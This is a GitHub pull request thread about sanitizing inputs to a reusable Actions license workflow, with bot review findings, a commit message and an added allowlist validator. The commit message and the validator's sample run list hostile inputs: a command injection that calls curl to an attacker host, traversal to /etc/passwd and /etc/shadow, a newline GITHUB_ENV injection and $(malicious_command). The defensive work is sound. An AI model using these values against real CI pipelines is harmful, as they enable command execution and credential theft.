@thst-nordic (Owner) commented Nov 11, 2025

Sanitize inputs in license-reusable.yml to fix GitHub Actions command injection and path traversal vulnerabilities.

The original workflow directly interpolated user-provided inputs into shell commands and file paths, allowing for potential command injection and path traversal. This PR introduces input validation, uses sanitized environment variables, and ensures proper shell quoting to prevent these attacks.




Note

Sanitizes and safely uses inputs in the reusable license workflow, hardening it against command injection and path traversal while adjusting paths/working directory accordingly.

  • CI (GitHub Actions) in .github/workflows/license-reusable.yml:
    • Input sanitization: Validate inputs.path and inputs.license_allow_list to block traversal/injection; export SANITIZED_PATH and SANITIZED_LICENSE_ALLOW_LIST.
    • Safe variable usage: Replace direct interpolation with quoted env vars (MODULE_PATH, LICENSE_ALLOW_LIST) across checkout, debug logs, license check, and artifact upload.
    • Execution flow: Change to working-directory: ncs and cd "${MODULE_PATH}" before running check_license.py; ensure all paths/args are quoted.
    • Artifacts: Upload licenses.xml from ncs/${{ env.MODULE_PATH }}/licenses.xml using sanitized path.

Written by Cursor Bugbot for commit 4c8143eb09564782bda333d1fd0f177f42718211. This will update automatically on new commits.

cursor bot commented Nov 11, 2025

Cursor Agent can help with this pull request. Just @cursor in comments and I'll start working on changes in this branch.

@thst-nordic thst-nordic marked this pull request as ready for review November 11, 2025 14:02

@cursor cursor bot left a comment


This PR is being reviewed by Cursor Bugbot

# Set sanitized environment variables
echo "SANITIZED_PATH=${{ inputs.path }}" >> $GITHUB_ENV
echo "SANITIZED_LICENSE_ALLOW_LIST=${{ inputs.license_allow_list }}" >> $GITHUB_ENV
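Review bot: Both echo lines still expand ${{ inputs.path }} and ${{ inputs.license_allow_list }} inside the script text, so what lands under the SANITIZED_ names is the raw input, substituted by the runner before the shell parses the line; a double quote in the input ends the echo string. Bind each input in the step's env: block and write the shell variable instead, for example printf 'SANITIZED_PATH=%s\n' "$INPUT_PATH" >> "$GITHUB_ENV" (INPUT_PATH standing for whatever name the env: mapping uses), and quote $GITHUB_ENV.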
Bug: Newline Injection: Compromising GITHUB_ENV Security

The validation regex doesn't check for newline characters (\n or \r), allowing GITHUB_ENV injection attacks. An attacker can provide input containing newlines to inject arbitrary environment variables when the values are written to $GITHUB_ENV in lines 58-59, bypassing the intended security controls and potentially executing malicious code in subsequent workflow steps.


# Validate license_allow_list input
if [[ "${{ inputs.license_allow_list }}" =~ \.\./|\;|\||\&|\$\(|\`|\<|\>|[ ]{2,} ]]; then
echo "Error: Invalid characters detected in license_allow_list input"
exit 1
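Review bot: The test on the `if [[ "${{ inputs.license_allow_list }}" =~ ...` line places the input inside a double-quoted string in the script itself, so an input containing a double quote closes that string before the regex is evaluated. Bind the input in env: and test the variable, as in [[ "$LICENSE_ALLOW_LIST" =~ ... ]]. The pattern is also a denylist with no entry for double quotes or newlines; matching the whole value against an allowlist of the characters a license list legitimately needs would be tighter.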
Bug: Absolute Paths Bypass Workspace Security

The validation regex doesn't reject absolute paths (starting with /), allowing attackers to specify paths outside the intended workspace. The documentation states paths should be "relative to west workspace," but inputs like /etc/passwd would pass validation and be used in checkout paths and directory operations, potentially accessing or modifying unintended filesystem locations.


@thst-nordic thst-nordic force-pushed the cursor/sanitize-github-action-inputs-and-fix-vulnerabilities-4efe branch from 1575aae to 4c8143e Compare November 11, 2025 14:51
…cense-reusable workflow

This commit addresses critical security vulnerabilities in the license-reusable.yml
GitHub Actions workflow that could allow multiple attack vectors through unsanitized
user inputs.

Security Issues Fixed:
1. Command Injection - Direct interpolation of ${{ inputs.path }} in shell commands
2. Path Traversal - Unsanitized relative path inputs (../) accessing unintended files
3. Absolute Path Access - Paths starting with / bypassing workspace restrictions
4. GITHUB_ENV Injection - Newline characters allowing environment variable injection
5. Shell Metacharacter Injection - Various shell operators enabling code execution

Key Security Changes:
✅ Comprehensive input validation with regex blocking dangerous patterns
✅ Absolute path rejection enforcing relative-only workspace paths
✅ Newline character detection preventing GITHUB_ENV injection attacks
✅ Sanitized environment variables replacing direct input interpolation
✅ Proper shell quoting around all variable references
✅ Explicit permissions section following principle of least privilege
✅ Updated actions/cache to v4 for latest security patches

Attack Examples Blocked:
- Command injection: path="; curl http://attacker.com/steal; #"
- Path traversal: path="../../../etc/passwd"
- Absolute paths: path="/etc/shadow"
- GITHUB_ENV injection: path="module\nMALICIOUS_VAR=evil_payload"
- Shell expansion: license_allow_list="$(malicious_command)"

Validation Patterns:
- Blocks: ../, ;, |, &, $(), backticks, <, >, \n, \r, ^/, multiple spaces
- Enforces: Relative paths only, no shell metacharacters, no newlines
- Applies to: Both 'path' and 'license_allow_list' inputs

The workflow now safely validates and sanitizes all user-controlled inputs,
eliminating injection vulnerabilities and preventing CI/CD environment compromise.
@cursor cursor bot force-pushed the cursor/sanitize-github-action-inputs-and-fix-vulnerabilities-4efe branch from a8a1590 to d8ae154 Compare November 11, 2025 14:56
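
An allowlist alternative to the denylist validation discussed in this thread, as an added example that is not code from the PR or the repository. It assumes the workflow passes the input as an environment variable (the name `INPUT_PATH` is hypothetical) and uses a temp file in place of `$GITHUB_ENV`; the function names are also made up for illustration.

```bash
# Added example (not from the PR). INPUT_PATH is an assumed variable name: the
# workflow would set it with `env: INPUT_PATH: ${{ inputs.path }}` so the value
# reaches the shell as data and is never pasted into the script text.
LC_ALL=C; export LC_ALL   # make the A-Z / a-z ranges byte-exact

# Return 0 if $1 is a safe workspace-relative path, 1 otherwise.
is_safe_rel_path() {
    case $1 in
        '')                  return 1 ;;  # empty
        /*)                  return 1 ;;  # absolute path
        *[!A-Za-z0-9._/-]*)  return 1 ;;  # newline, CR, space, quotes, ; | & $ < > ...
        ..|../*|*/..|*/../*) return 1 ;;  # any ".." path segment
    esac
    return 0
}

# Append SANITIZED_PATH=<value> to the env file ($2) only if validation passes.
export_sanitized_path() {
    is_safe_rel_path "$1" || return 1
    printf 'SANITIZED_PATH=%s\n' "$1" >> "$2"
}

# Constructed sample run: the path examples from the commit message plus one
# legitimate-looking module path; a temp file stands in for "$GITHUB_ENV".
NL='
'
env_file=$(mktemp)
for candidate in 'modules/lib/foo' '../../../etc/passwd' '/etc/shadow' \
                 '; curl http://attacker.com/steal; #' \
                 "module${NL}MALICIOUS_VAR=evil_payload"; do
    if export_sanitized_path "$candidate" "$env_file"; then
        echo "accepted: $candidate"
    else
        echo "rejected"
    fi
done
cat "$env_file"   # only the accepted path was written
rm -f "$env_file"
```

Because the check lists what is allowed rather than what is forbidden, characters the regex never mentioned (quotes, newlines, a lone `$`) are rejected without needing their own rule.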